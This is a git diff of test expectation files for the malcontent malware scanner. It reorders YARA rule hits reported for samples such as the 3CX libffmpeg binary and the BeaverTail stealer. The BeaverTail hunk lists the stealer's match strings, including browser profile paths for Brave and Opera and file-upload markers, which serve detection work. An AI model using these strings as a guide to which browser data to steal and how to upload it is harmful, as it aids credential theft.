[dt >> 5](https://github.com/search?q=dt+%3E%3E+5&type=code)
[got << 8](https://github.com/search?q=got+%3C%3C+8&type=code)
[gp >> 1](https://github.com/search?q=gp+%3E%3E+1&type=code) | -| MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#excessive_hex_refs) | many references to hexadecimal values | [0x0001](https://github.com/search?q=0x0001&type=code)
[0x0007](https://github.com/search?q=0x0007&type=code)
[0x0008](https://github.com/search?q=0x0008&type=code)
[0x0009](https://github.com/search?q=0x0009&type=code)
[0x000a](https://github.com/search?q=0x000a&type=code)
[0x000c](https://github.com/search?q=0x000c&type=code)
[0x000d](https://github.com/search?q=0x000d&type=code)
[0x000e](https://github.com/search?q=0x000e&type=code)
[0x000f](https://github.com/search?q=0x000f&type=code)
[0x0014](https://github.com/search?q=0x0014&type=code)
[0x0015](https://github.com/search?q=0x0015&type=code)
[0x0016](https://github.com/search?q=0x0016&type=code)
[0x0017](https://github.com/search?q=0x0017&type=code)
[0x0018](https://github.com/search?q=0x0018&type=code)
[0x0019](https://github.com/search?q=0x0019&type=code)
[0x0020](https://github.com/search?q=0x0020&type=code)
[0x0021](https://github.com/search?q=0x0021&type=code)
[0x0022](https://github.com/search?q=0x0022&type=code)
[0x0023](https://github.com/search?q=0x0023&type=code)
[0x0065](https://github.com/search?q=0x0065&type=code)
[0x0066](https://github.com/search?q=0x0066&type=code)
[0x01](https://github.com/search?q=0x01&type=code)
[0x02014b50](https://github.com/search?q=0x02014b50&type=code)
[0x03](https://github.com/search?q=0x03&type=code)
[0x04034b50](https://github.com/search?q=0x04034b50&type=code)
[0x05054b50](https://github.com/search?q=0x05054b50&type=code)
[0x06054b50](https://github.com/search?q=0x06054b50&type=code)
[0x06064b50](https://github.com/search?q=0x06064b50&type=code)
[0x07064b50](https://github.com/search?q=0x07064b50&type=code)
[0x07c8](https://github.com/search?q=0x07c8&type=code)
[0x08064b50](https://github.com/search?q=0x08064b50&type=code)
[0x08074b50](https://github.com/search?q=0x08074b50&type=code)
[0x0f](https://github.com/search?q=0x0f&type=code)
[0x10000000](https://github.com/search?q=0x10000000&type=code)
[0x19DB1DED](https://github.com/search?q=0x19DB1DED&type=code)
[0x1f](https://github.com/search?q=0x1f&type=code)
[0x20](https://github.com/search?q=0x20&type=code)
[0x2146444e](https://github.com/search?q=0x2146444e&type=code)
[0x2605](https://github.com/search?q=0x2605&type=code)
[0x2705](https://github.com/search?q=0x2705&type=code)
[0x2805](https://github.com/search?q=0x2805&type=code)
[0x334d](https://github.com/search?q=0x334d&type=code)
[0x3e](https://github.com/search?q=0x3e&type=code)
[0x3f](https://github.com/search?q=0x3f&type=code)
[0x4154](https://github.com/search?q=0x4154&type=code)
[0x42726577](https://github.com/search?q=0x42726577&type=code)
[0x4341](https://github.com/search?q=0x4341&type=code)
[0x4453](https://github.com/search?q=0x4453&type=code)
[0x4690](https://github.com/search?q=0x4690&type=code)
[0x4704](https://github.com/search?q=0x4704&type=code)
[0x470f](https://github.com/search?q=0x470f&type=code)
[0x4854](https://github.com/search?q=0x4854&type=code)
[0x4b46](https://github.com/search?q=0x4b46&type=code)
[0x4c41](https://github.com/search?q=0x4c41&type=code)
[0x4d49](https://github.com/search?q=0x4d49&type=code)
[0x4d63](https://github.com/search?q=0x4d63&type=code)
[0x4f4c](https://github.com/search?q=0x4f4c&type=code)
[0x504b4453](https://github.com/search?q=0x504b4453&type=code)
[0x5356](https://github.com/search?q=0x5356&type=code)
[0x5455](https://github.com/search?q=0x5455&type=code)
[0x554e](https://github.com/search?q=0x554e&type=code)
[0x5855](https://github.com/search?q=0x5855&type=code)
[0x5a4c](https://github.com/search?q=0x5a4c&type=code)
[0x5a4d](https://github.com/search?q=0x5a4d&type=code)
[0x6375](https://github.com/search?q=0x6375&type=code)
[0x6542](https://github.com/search?q=0x6542&type=code)
[0x6854](https://github.com/search?q=0x6854&type=code)
[0x6dff800d](https://github.com/search?q=0x6dff800d&type=code)
[0x7075](https://github.com/search?q=0x7075&type=code)
[0x7109871a](https://github.com/search?q=0x7109871a&type=code)
[0x71777777](https://github.com/search?q=0x71777777&type=code)
[0x7441](https://github.com/search?q=0x7441&type=code)
[0x756e](https://github.com/search?q=0x756e&type=code)
[0x7855](https://github.com/search?q=0x7855&type=code)
[0x7875](https://github.com/search?q=0x7875&type=code)
[0x7FFF](https://github.com/search?q=0x7FFF&type=code)
[0x7f](https://github.com/search?q=0x7f&type=code)
[0x8000](https://github.com/search?q=0x8000&type=code)
[0x9901](https://github.com/search?q=0x9901&type=code)
[0xA220](https://github.com/search?q=0xA220&type=code)
[0xCAFE](https://github.com/search?q=0xCAFE&type=code)
[0xE9F3F9F0](https://github.com/search?q=0xE9F3F9F0&type=code)
[0xFFFFFFFF](https://github.com/search?q=0xFFFFFFFF&type=code)
[0xa11e](https://github.com/search?q=0xa11e&type=code)
[0xf05368c0](https://github.com/search?q=0xf05368c0&type=code)
[0xfb4a](https://github.com/search?q=0xfb4a&type=code)
[0xff3b5998](https://github.com/search?q=0xff3b5998&type=code)
[\x00](https://github.com/search?q=%5Cx00&type=code)
[\x01](https://github.com/search?q=%5Cx01&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [Darwin](https://github.com/search?q=Darwin&type=code)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[https://](https://) | -| MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [ZIP64](https://github.com/search?q=ZIP64&type=code)
[zip files](https://github.com/search?q=zip+files&type=code)
[zipfile](https://github.com/search?q=zipfile&type=code) | +| MEDIUM | [anti-static/obfuscation/bitwise](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/bitwise.yara#bidirectional_bitwise_math) | [uses bitwise math in both directions](https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection) | [dt >> 11](https://github.com/search?q=dt+%3E%3E+11&type=code)
[dt >> 16](https://github.com/search?q=dt+%3E%3E+16&type=code)
[dt >> 21](https://github.com/search?q=dt+%3E%3E+21&type=code)
[dt >> 25](https://github.com/search?q=dt+%3E%3E+25&type=code)
[got << 8](https://github.com/search?q=got+%3C%3C+8&type=code)
[1 << 11](https://github.com/search?q=1+%3C%3C+11&type=code)
[dt << 1](https://github.com/search?q=dt+%3C%3C+1&type=code)
[dt >> 5](https://github.com/search?q=dt+%3E%3E+5&type=code)
[gp >> 1](https://github.com/search?q=gp+%3E%3E+1&type=code)
[1 << 0](https://github.com/search?q=1+%3C%3C+0&type=code)
[1 << 3](https://github.com/search?q=1+%3C%3C+3&type=code)
[1 << 4](https://github.com/search?q=1+%3C%3C+4&type=code)
[1 << 5](https://github.com/search?q=1+%3C%3C+5&type=code)
[1 << 6](https://github.com/search?q=1+%3C%3C+6&type=code)
[2 << 1](https://github.com/search?q=2+%3C%3C+1&type=code) | +| MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#excessive_hex_refs) | many references to hexadecimal values | [0x02014b50](https://github.com/search?q=0x02014b50&type=code)
[0x04034b50](https://github.com/search?q=0x04034b50&type=code)
[0x05054b50](https://github.com/search?q=0x05054b50&type=code)
[0x06054b50](https://github.com/search?q=0x06054b50&type=code)
[0x06064b50](https://github.com/search?q=0x06064b50&type=code)
[0x07064b50](https://github.com/search?q=0x07064b50&type=code)
[0x08064b50](https://github.com/search?q=0x08064b50&type=code)
[0x08074b50](https://github.com/search?q=0x08074b50&type=code)
[0x10000000](https://github.com/search?q=0x10000000&type=code)
[0x19DB1DED](https://github.com/search?q=0x19DB1DED&type=code)
[0x2146444e](https://github.com/search?q=0x2146444e&type=code)
[0x42726577](https://github.com/search?q=0x42726577&type=code)
[0x504b4453](https://github.com/search?q=0x504b4453&type=code)
[0x6dff800d](https://github.com/search?q=0x6dff800d&type=code)
[0x7109871a](https://github.com/search?q=0x7109871a&type=code)
[0x71777777](https://github.com/search?q=0x71777777&type=code)
[0xE9F3F9F0](https://github.com/search?q=0xE9F3F9F0&type=code)
[0xFFFFFFFF](https://github.com/search?q=0xFFFFFFFF&type=code)
[0xf05368c0](https://github.com/search?q=0xf05368c0&type=code)
[0xff3b5998](https://github.com/search?q=0xff3b5998&type=code)
[0x0001](https://github.com/search?q=0x0001&type=code)
[0x0007](https://github.com/search?q=0x0007&type=code)
[0x0008](https://github.com/search?q=0x0008&type=code)
[0x0009](https://github.com/search?q=0x0009&type=code)
[0x000a](https://github.com/search?q=0x000a&type=code)
[0x000c](https://github.com/search?q=0x000c&type=code)
[0x000d](https://github.com/search?q=0x000d&type=code)
[0x000e](https://github.com/search?q=0x000e&type=code)
[0x000f](https://github.com/search?q=0x000f&type=code)
[0x0014](https://github.com/search?q=0x0014&type=code)
[0x0015](https://github.com/search?q=0x0015&type=code)
[0x0016](https://github.com/search?q=0x0016&type=code)
[0x0017](https://github.com/search?q=0x0017&type=code)
[0x0018](https://github.com/search?q=0x0018&type=code)
[0x0019](https://github.com/search?q=0x0019&type=code)
[0x0020](https://github.com/search?q=0x0020&type=code)
[0x0021](https://github.com/search?q=0x0021&type=code)
[0x0022](https://github.com/search?q=0x0022&type=code)
[0x0023](https://github.com/search?q=0x0023&type=code)
[0x0065](https://github.com/search?q=0x0065&type=code)
[0x0066](https://github.com/search?q=0x0066&type=code)
[0x07c8](https://github.com/search?q=0x07c8&type=code)
[0x2605](https://github.com/search?q=0x2605&type=code)
[0x2705](https://github.com/search?q=0x2705&type=code)
[0x2805](https://github.com/search?q=0x2805&type=code)
[0x334d](https://github.com/search?q=0x334d&type=code)
[0x4154](https://github.com/search?q=0x4154&type=code)
[0x4341](https://github.com/search?q=0x4341&type=code)
[0x4453](https://github.com/search?q=0x4453&type=code)
[0x4690](https://github.com/search?q=0x4690&type=code)
[0x4704](https://github.com/search?q=0x4704&type=code)
[0x470f](https://github.com/search?q=0x470f&type=code)
[0x4854](https://github.com/search?q=0x4854&type=code)
[0x4b46](https://github.com/search?q=0x4b46&type=code)
[0x4c41](https://github.com/search?q=0x4c41&type=code)
[0x4d49](https://github.com/search?q=0x4d49&type=code)
[0x4d63](https://github.com/search?q=0x4d63&type=code)
[0x4f4c](https://github.com/search?q=0x4f4c&type=code)
[0x5356](https://github.com/search?q=0x5356&type=code)
[0x5455](https://github.com/search?q=0x5455&type=code)
[0x554e](https://github.com/search?q=0x554e&type=code)
[0x5855](https://github.com/search?q=0x5855&type=code)
[0x5a4c](https://github.com/search?q=0x5a4c&type=code)
[0x5a4d](https://github.com/search?q=0x5a4d&type=code)
[0x6375](https://github.com/search?q=0x6375&type=code)
[0x6542](https://github.com/search?q=0x6542&type=code)
[0x6854](https://github.com/search?q=0x6854&type=code)
[0x7075](https://github.com/search?q=0x7075&type=code)
[0x7441](https://github.com/search?q=0x7441&type=code)
[0x756e](https://github.com/search?q=0x756e&type=code)
[0x7855](https://github.com/search?q=0x7855&type=code)
[0x7875](https://github.com/search?q=0x7875&type=code)
[0x7FFF](https://github.com/search?q=0x7FFF&type=code)
[0x8000](https://github.com/search?q=0x8000&type=code)
[0x9901](https://github.com/search?q=0x9901&type=code)
[0xA220](https://github.com/search?q=0xA220&type=code)
[0xCAFE](https://github.com/search?q=0xCAFE&type=code)
[0xa11e](https://github.com/search?q=0xa11e&type=code)
[0xfb4a](https://github.com/search?q=0xfb4a&type=code)
[0x01](https://github.com/search?q=0x01&type=code)
[0x03](https://github.com/search?q=0x03&type=code)
[0x0f](https://github.com/search?q=0x0f&type=code)
[0x1f](https://github.com/search?q=0x1f&type=code)
[0x20](https://github.com/search?q=0x20&type=code)
[0x3e](https://github.com/search?q=0x3e&type=code)
[0x3f](https://github.com/search?q=0x3f&type=code)
[0x7f](https://github.com/search?q=0x7f&type=code)
[\x00](https://github.com/search?q=%5Cx00&type=code)
[\x01](https://github.com/search?q=%5Cx01&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[Darwin](https://github.com/search?q=Darwin&type=code) | +| MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip files](https://github.com/search?q=zip+files&type=code)
[zipfile](https://github.com/search?q=zipfile&type=code)
[ZIP64](https://github.com/search?q=ZIP64&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | | LOW | [crypto/decrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/decrypt.yara#decrypt) | decrypts data | [Policy Decryption Key Record](https://github.com/search?q=Policy+Decryption+Key+Record&type=code) | | LOW | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/opt/perl/bin/perl](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fperl%2Fbin%2Fperl&type=code) | | LOW | [fs/path/usr_bin](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/usr-bin.yara#usr_bin_path) | path reference within /usr/bin | [/usr/bin/perl](https://github.com/search?q=%2Fusr%2Fbin%2Fperl&type=code) | | LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://android.googlesource.com/platform/tools/apksig/](https://android.googlesource.com/platform/tools/apksig/)
[https://github.com/pmqs/zipdetails/issues](https://github.com/pmqs/zipdetails/issues)
[https://www.telerik.com/fiddler](https://www.telerik.com/fiddler)
[https://www.winzip.com/win/es/aes_info.html](https://www.winzip.com/win/es/aes_info.html) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://android.googlesource.com/platform/tools/apksig/](https://android.googlesource.com/platform/tools/apksig/)
[https://www.winzip.com/win/es/aes_info.html](https://www.winzip.com/win/es/aes_info.html)
[https://github.com/pmqs/zipdetails/issues](https://github.com/pmqs/zipdetails/issues)
[https://www.telerik.com/fiddler](https://www.telerik.com/fiddler) | diff --git a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff index 00f6b179e..1695f435d 100644 Binary files a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff and b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff differ diff --git a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff index 6a76d5292..c81f51de6 100644 Binary files a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff and b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff differ diff --git a/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff index 856218d9b..0506bc15e 100644 --- a/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff @@ -11,16 +11,16 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| -MEDIUM | [crypto/encrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#encrypt) | encrypts data | [Encryption info](https://github.com/search?q=Encryption+info&type=code)
[Encryption initializati](https://github.com/search?q=Encryption+initializati&type=code) | -| -MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | -| -MEDIUM | [data/base64/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-encode.yara#py_base64_encode) | encode base64 strings | [base64_encode](https://github.com/search?q=base64_encode&type=code) | +| -MEDIUM | [crypto/encrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#encrypt) | encrypts data | [Encryption initializati](https://github.com/search?q=Encryption+initializati&type=code)
[Encryption info](https://github.com/search?q=Encryption+info&type=code) | +| -MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [py_base64_decode::base64_decode](https://github.com/search?q=py_base64_decode%3A%3Abase64_decode&type=code) | +| -MEDIUM | [data/base64/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-encode.yara#py_base64_encode) | encode base64 strings | [py_base64_encode::base64_encode](https://github.com/search?q=py_base64_encode%3A%3Abase64_encode&type=code) | | -MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) | | -MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [user_agent](https://github.com/search?q=user_agent&type=code) | | -MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| -LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [http://](http://)
[https://](https://)
[x86](https://github.com/search?q=x86&type=code) | -| -LOW | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref) | references a specific operating system | [Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[https://](https://) | +| -LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86](https://github.com/search?q=x86&type=code) | +| -LOW | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref) | references a specific operating system | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://) | | -LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | -| -LOW | [crypto/rc4](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4.yara#rc4_ksa) | RC4 key scheduling algorithm, by Thomas Barabosch | $cmp_e_x_256
$cmp_r_x_256 | +| -LOW | [crypto/rc4](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4.yara#rc4_ksa) | RC4 key scheduling algorithm, by Thomas Barabosch | | | -LOW | [data/compression/zlib](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zlib.yara#zlib) | uses zlib | [zlib](https://github.com/search?q=zlib&type=code) | | -LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | -LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | @@ -31,6 +31,6 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://crl.apple.com/codesigning.crl0](http://crl.apple.com/codesigning.crl0)
[http://www.apple.com/DTDs/PropertyList](http://www.apple.com/DTDs/PropertyList)
[http://www.apple.com/appleca/root.crl0](http://www.apple.com/appleca/root.crl0)
[https://www.apple.com/appleca/0](https://www.apple.com/appleca/0) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://www.apple.com/DTDs/PropertyList](http://www.apple.com/DTDs/PropertyList)
[http://www.apple.com/appleca/root.crl0](http://www.apple.com/appleca/root.crl0)
[http://crl.apple.com/codesigning.crl0](http://crl.apple.com/codesigning.crl0)
[https://www.apple.com/appleca/0](https://www.apple.com/appleca/0) | | LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | diff --git a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff index 6a76d5292..c81f51de6 100644 Binary files a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff and b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff differ diff --git a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff index 6a76d5292..c81f51de6 100644 Binary files a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff and b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff differ diff --git a/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff index e244cc49b..18bd51d21 100644 --- a/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff @@ -4,16 +4,16 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| +MEDIUM | **[crypto/encrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#encrypt)** | encrypts data | [Encryption info](https://github.com/search?q=Encryption+info&type=code)
[Encryption initializati](https://github.com/search?q=Encryption+initializati&type=code) | -| +MEDIUM | **[data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode)** | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | -| +MEDIUM | **[data/base64/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-encode.yara#py_base64_encode)** | encode base64 strings | [base64_encode](https://github.com/search?q=base64_encode&type=code) | +| +MEDIUM | **[crypto/encrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#encrypt)** | encrypts data | [Encryption initializati](https://github.com/search?q=Encryption+initializati&type=code)
[Encryption info](https://github.com/search?q=Encryption+info&type=code) | +| +MEDIUM | **[data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode)** | decode base64 strings | [py_base64_decode::base64_decode](https://github.com/search?q=py_base64_decode%3A%3Abase64_decode&type=code) | +| +MEDIUM | **[data/base64/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-encode.yara#py_base64_encode)** | encode base64 strings | [py_base64_encode::base64_encode](https://github.com/search?q=py_base64_encode%3A%3Abase64_encode&type=code) | | +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) | | +MEDIUM | **[impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent)** | references an 'agent' | [user_agent](https://github.com/search?q=user_agent&type=code) | | +MEDIUM | **[net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post)** | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| +LOW | **[c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref)** | references a specific architecture | [http://](http://)
[https://](https://)
[x86](https://github.com/search?q=x86&type=code) | -| +LOW | **[c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref)** | references a specific operating system | [Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[https://](https://) | +| +LOW | **[c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref)** | references a specific architecture | [https://](https://)
[http://](http://)
[x86](https://github.com/search?q=x86&type=code) | +| +LOW | **[c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref)** | references a specific operating system | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://) | | +LOW | **[crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes)** | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | -| +LOW | **[crypto/rc4](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4.yara#rc4_ksa)** | RC4 key scheduling algorithm, by Thomas Barabosch | $cmp_e_x_256
$cmp_r_x_256 | +| +LOW | **[crypto/rc4](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4.yara#rc4_ksa)** | RC4 key scheduling algorithm, by Thomas Barabosch | | | +LOW | **[data/compression/zlib](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zlib.yara#zlib)** | uses zlib | [zlib](https://github.com/search?q=zlib&type=code) | | +LOW | **[data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64)** | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | +LOW | **[fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir)** | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | @@ -31,6 +31,6 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://crl.apple.com/root.crl0](http://crl.apple.com/root.crl0)
[http://crl.apple.com/timestamp.crl0](http://crl.apple.com/timestamp.crl0)
[http://ocsp.apple.com/ocsp03](http://ocsp.apple.com/ocsp03)
[http://www.apple.com/DTDs/PropertyList](http://www.apple.com/DTDs/PropertyList)
[http://www.apple.com/appleca0](http://www.apple.com/appleca0)
[http://www.apple.com/certificateauthority/0](http://www.apple.com/certificateauthority/0)
[https://www.apple.com/appleca/0](https://www.apple.com/appleca/0) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://www.apple.com/certificateauthority/0](http://www.apple.com/certificateauthority/0)
[http://www.apple.com/DTDs/PropertyList](http://www.apple.com/DTDs/PropertyList)
[http://crl.apple.com/timestamp.crl0](http://crl.apple.com/timestamp.crl0)
[https://www.apple.com/appleca/0](https://www.apple.com/appleca/0)
[http://crl.apple.com/root.crl0](http://crl.apple.com/root.crl0)
[http://www.apple.com/appleca0](http://www.apple.com/appleca0)
[http://ocsp.apple.com/ocsp03](http://ocsp.apple.com/ocsp03) | | LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | diff --git a/tests/macOS/2024.BeaverTail/Jami.json b/tests/macOS/2024.BeaverTail/Jami.json index 4992552dd..b931fce82 100644 --- a/tests/macOS/2024.BeaverTail/Jami.json +++ b/tests/macOS/2024.BeaverTail/Jami.json @@ -8,16 +8,16 @@ { "Description": "Stealer targeted macOS and Windows for Lazarus", "MatchStrings": [ - "%1_%2_%3_%4_%5", - "/.pyp/python.exe", - "/AppData/Local/BraveSoftware/Brave-Browser/User Data", "/Library/Application Support/BraveSoftware/Brave-Browser", + "/AppData/Local/BraveSoftware/Brave-Browser/User Data", "/Library/Application Support/com.operasoftware.opera", + "boundary=---------------------------99614912995", + "form-data; name=\"multi_file\"; filename=\"%1\"", "Download Client Success!", "Download Python Success!", "Upload LDB Finshed!!!", - "boundary=---------------------------99614912995", - "form-data; name=\"multi_file\"; filename=\"%1\"" + "/.pyp/python.exe", + "%1_%2_%3_%4_%5" ], "RiskScore": 4, 